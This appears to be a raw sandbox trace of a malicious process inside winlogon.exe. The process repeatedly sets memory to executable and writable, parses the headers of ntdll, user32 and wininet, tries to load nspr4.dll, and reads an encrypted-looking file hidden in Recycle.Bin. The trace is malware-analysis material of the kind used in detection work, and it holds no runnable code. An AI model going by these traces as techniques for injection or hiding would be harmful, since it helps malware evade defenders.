Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019341179
System info queried Type: BasicInformation success or wait 2019341281
System info queried Type: ProcessorInformation success or wait 2019341383
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019341524
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019341823
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2019341915
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019342055
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019342145
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2019342253
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019342462
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2019342552
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019342737
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019342854
System info queried Type: BasicInformation success or wait 2019343139
System info queried Type: ProcessorInformation success or wait 2019343241
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019343670
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BB10168 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019343777
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2019344357
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2019345153
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2019345515
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2019350926
System info queried Type: BasicInformation success or wait 2019351039
System info queried Type: ProcessorInformation success or wait 2019351147
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019351294
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2019351610
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 4 Value: D8 00 00 00 success or wait 2019351706
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2019352495
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 20 Value: 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019352592
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 2019352704
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2019352918
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 2019353012
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\user32.dll success or wait 2019353200
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2019353322
System info queried Type: BasicInformation success or wait 2019354247
System info queried Type: ProcessorInformation success or wait 2019354359
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019355382
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAFC210 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019355494
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2019355634
System info queried Type: BasicInformation success or wait 2019355736
System info queried Type: ProcessorInformation success or wait 2019355838
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019355987
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019356300
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019356395
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019361972
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019362882
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019363008
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019363506
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019363597
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019363786
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019363908
System info queried Type: BasicInformation success or wait 2019914848
System info queried Type: ProcessorInformation success or wait 2019914957
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019916404
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BB10D98 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019916509
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2019916653
System info queried Type: BasicInformation success or wait 2019916756
System info queried Type: ProcessorInformation success or wait 2019916859
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019917029
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019917374
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019917465
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019917605
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019917694
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019917801
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019918012
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019918101
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019918285
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019918402
System info queried Type: BasicInformation success or wait 2019919271
System info queried Type: ProcessorInformation success or wait 2019919376
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019919958
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BB104E8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019920063
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2019920199
System info queried Type: BasicInformation success or wait 2019920301
System info queried Type: ProcessorInformation success or wait 2019920402
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019920548
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019920853
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019920943
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019921078
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019921167
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019921273
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019921482
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019921570
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019921753
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019921869
System info queried Type: BasicInformation success or wait 2019922148
System info queried Type: ProcessorInformation success or wait 2019922253
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019922827
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAF65C8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019922932
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2019923540
System info queried Type: BasicInformation success or wait 2019923659
System info queried Type: ProcessorInformation success or wait 2019923760
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019923904
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019924205
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019924295
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019924430
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019924519
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019924624
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019924832
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019924920
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019925102
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019925218
System info queried Type: BasicInformation success or wait 2019926057
System info queried Type: ProcessorInformation success or wait 2019926300
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019926912
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAFF660 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019927019
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2019927376
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2019928143
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 3D94D508 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2019932510
System info queried Type: BasicInformation success or wait 2019932615
System info queried Type: ProcessorInformation success or wait 2019932717
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019932861
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019933170
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019933261
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019933396
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019933487
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019933597
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019933808
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019933899
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019934085
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019934205
System info queried Type: BasicInformation success or wait 2019934490
System info queried Type: ProcessorInformation success or wait 2019934595
System info queried Type: BasicInformation success or wait 2019935515
System info queried Type: ProcessorInformation success or wait 2019935617
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019935764
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019936068
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019936162
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019936300
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019936393
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019936502
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019936713
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019936805
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019936991
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019937109
System info queried Type: BasicInformation success or wait 2019937391
System info queried Type: ProcessorInformation success or wait 2019937495
System info queried Type: BasicInformation success or wait 2019938414
System info queried Type: ProcessorInformation success or wait 2019938515
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019938662
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019938965
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019939058
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019939196
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019939288
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019939396
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019939608
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019939699
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019939884
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019940003
System info queried Type: BasicInformation success or wait 2019941063
System info queried Type: ProcessorInformation success or wait 2019941168
System info queried Type: BasicInformation success or wait 2019942156
System info queried Type: ProcessorInformation success or wait 2019942270
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019942417
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019942723
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019942817
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019942956
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019943048
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019943169
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019943461
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2019943563
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019943750
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019943869
System info queried Type: BasicInformation success or wait 2019945258
System info queried Type: ProcessorInformation success or wait 2019945371
System info queried Type: BasicInformation success or wait 2019946310
System info queried Type: ProcessorInformation success or wait 2019946413
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019946562
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019946867
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2019946961
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019947101
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2019947193
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2019947303
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2019947515
